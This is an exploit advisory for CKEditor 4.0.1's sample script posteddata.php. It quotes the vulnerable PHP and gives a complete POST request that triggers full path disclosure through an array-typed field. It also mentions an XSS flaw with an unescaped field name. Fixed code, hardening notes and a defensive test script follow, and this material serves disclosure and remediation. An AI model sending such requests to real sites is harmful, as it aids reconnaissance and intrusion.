===========================================
Vulnerable Software: CKEditor 4.0.1 (standard package)
Download: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
Vulns: Full Path Disclosure && XSS
===========================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache Traffic Server 3.2.0
MySQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
Vulnerable Code: /ckeditor/samples/assets/posteddata.php
(The listing below is reconstructed from the stripped copy in this advisory: the HTML and PHP tags were lost, so the page skeleton and the table row that prints $key and $postedValue are filled back in from the visible pieces; the escaping logic is the 4.0.1 code as quoted.)
=============SNIP BEGINS====================
root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>Sample &mdash; CKEditor</title>
</head>
<body>
	<h1 class="samples">
		CKEditor &mdash; Posted Data
	</h1>
	<table border="1" cellspacing="0" id="outputSample">
		<thead>
			<tr>
				<th>Field&nbsp;Name</th>
				<th>Value</th>
			</tr>
		</thead>
<?php
// Every POST field is echoed back to the client, one table row per field.
foreach ( $_POST as $key => $value )
{
	// $value is assumed to be a string. A field sent as name[]=... arrives
	// as an array; htmlspecialchars() rejects it with an E_WARNING, and with
	// display_errors on that warning (absolute script path included) is
	// written into the response. That is the Full Path Disclosure below.
	if ( get_magic_quotes_gpc() )
		$postedValue = htmlspecialchars( stripslashes( $value ) ) ;
	else
		$postedValue = htmlspecialchars( $value ) ;
?>
		<tr>
			<!-- only $value went through htmlspecialchars(); the field name is printed as received -->
			<th style="vertical-align: top"><?php echo $key; ?></th>
			<td><pre class="samples"><?php echo $postedValue; ?></pre></td>
		</tr>
<?php
}
?>
	</table>
</body>
</html>
=============SNIP ENDS HERE====================
Full Path Disclosure example:
URL: http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php
METHOD: POST
HEADERS:
Host: hacker1.own
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

POST DATA TO SEND:
bangbangbang[]=PATH DISCLOSURE

The trailing [] in the field name makes PHP build $_POST['bangbangbang'] as an array, so htmlspecialchars() receives an array instead of a string and emits a warning that contains the script's absolute path.

Result:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38

Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png
=================================================
CSRF+XSS
=================================================
Print Screen: http://i062.radikal.ru/1302/e6/25ef023dd589.png
=================================================
And here is the fixed version: /ckeditor/samples/assets/posteddata.php
(Only the loop body changes: both htmlspecialchars() calls now receive (string) $value. The surrounding markup is reconstructed the same way as in the vulnerable listing above.)
================SNIP BEGINS=======================
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>Sample &mdash; CKEditor</title>
</head>
<body>
	<h1 class="samples">
		CKEditor &mdash; Posted Data
	</h1>
	<table border="1" cellspacing="0" id="outputSample">
		<thead>
			<tr>
				<th>Field&nbsp;Name</th>
				<th>Value</th>
			</tr>
		</thead>
<?php
foreach ( $_POST as $key => $value )
{
	// Casting to string first means htmlspecialchars() never sees an array,
	// so the warning that leaked the path is no longer raised.
	if ( get_magic_quotes_gpc() )
		$postedValue = htmlspecialchars( stripslashes( (string) $value ) ) ;
	else
		$postedValue = htmlspecialchars( (string) $value ) ;
?>
		<tr>
			<th style="vertical-align: top"><?php echo $key; ?></th>
			<td><pre class="samples"><?php echo $postedValue; ?></pre></td>
		</tr>
<?php
}
?>
	</table>
</body>
</html>
=============SNIP ENDS HERE====================
Notes on the fix:
On the tested PHP 5.3 the cast turns an array into the literal string "Array" silently. PHP 5.4 and later raise E_NOTICE "Array to string conversion" for the same cast, so with display_errors on the path leaks again through the notice. Skipping values that are not scalars (is_scalar()) before escaping is the robust form, and the field name should go through htmlspecialchars() as well if it is rendered.
The disclosure only exists because the warning is rendered into the response: display_errors must be off on any Internet-facing host. The samples directory is demo code and should not be deployed with a production CKEditor install at all.
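As an added example (editor's code, not from this advisory and not CKEditor's own source), the script below puts the 4.0.1 escaping loop next to a hardened replacement and feeds both the exact $_POST that PHP builds from the advisory's body. The function names render_rows_vulnerable and render_rows_hardened are this example's own; it runs from the CLI on PHP 5.3 through PHP 8 and does not need a web server or CKEditor.

```php
<?php
// Added example (editor's code, not CKEditor's): the 4.0.1 escaping loop
// beside a hardened replacement, both given the $_POST that PHP builds from
// the advisory's POST body. Function names are this example's own.
// Run from the CLI: php posteddata_demo.php

// Shape of the 4.0.1 loop: every value goes straight into htmlspecialchars()
// and the field name is concatenated without escaping.
function render_rows_vulnerable(array $post)
{
    $html = '';
    foreach ($post as $key => $value) {
        // array value => E_WARNING on PHP 5/7, TypeError on PHP 8
        $postedValue = htmlspecialchars($value);
        $html .= "<tr><th>$key</th><td><pre>$postedValue</pre></td></tr>\n";
    }
    return $html;
}

// Hardened loop: drop anything that is not a scalar before it can reach
// htmlspecialchars(), and escape the field name as well as the value.
function render_rows_hardened(array $post)
{
    $html = '';
    foreach ($post as $key => $value) {
        if (!is_scalar($value)) {
            continue;   // name[]=x, nested arrays, null: never rendered
        }
        $k = htmlspecialchars((string) $key,   ENT_QUOTES, 'UTF-8');
        $v = htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
        $html .= "<tr><th>$k</th><td><pre>$v</pre></td></tr>\n";
    }
    return $html;
}

// Surface PHP warnings as exceptions, so the leak shows up here as a thrown
// error instead of as text inside an HTTP response.
set_error_handler(function ($errno, $errstr, $errfile, $errline) {
    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});

// Constructed input: what PHP's form decoder produces from the advisory's
// body "bangbangbang[]=PATH DISCLOSURE" (space form-encoded as '+').
parse_str('bangbangbang[]=PATH+DISCLOSURE', $post);
// $post === array('bangbangbang' => array(0 => 'PATH DISCLOSURE'))

try {
    render_rows_vulnerable($post);
    echo "vulnerable loop: no error (unexpected)\n";
} catch (ErrorException $e) {
    // Same message the advisory shows, with this script's absolute path.
    echo "vulnerable loop leaks: " . $e->getMessage() . " in " . $e->getFile() . "\n";
} catch (TypeError $e) {
    // PHP 8 turns the same call into a TypeError: still an error page with
    // the path in it when display_errors is on.
    echo "vulnerable loop (PHP 8): " . $e->getMessage() . "\n";
}

echo "hardened loop on the same input:\n" . render_rows_hardened($post);
// prints no rows: the array field is skipped, so no warning and no path

// Second constructed body: scalar values, but markup in a field NAME and
// in a value. Both end up entity-encoded in the hardened output.
parse_str('%3Cb%3Efield%3C%2Fb%3E=ok&title=Hello+%3Cb%3Eworld%3C%2Fb%3E', $post2);
echo "hardened loop with markup in names and values:\n" . render_rows_hardened($post2);
```

The is_scalar() check is what actually closes the disclosure: it keeps htmlspecialchars() from ever seeing an array, in contrast to a (string) cast, which merely changes which PHP versions complain. Escaping the field name with ENT_QUOTES covers the other half of the page's output, where the 4.0.1 loop prints $key as received.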
=============ENJOYYY====================
KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ
*Especially to my bro CAMOUFL4G3*
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
===========================================
/AkaStep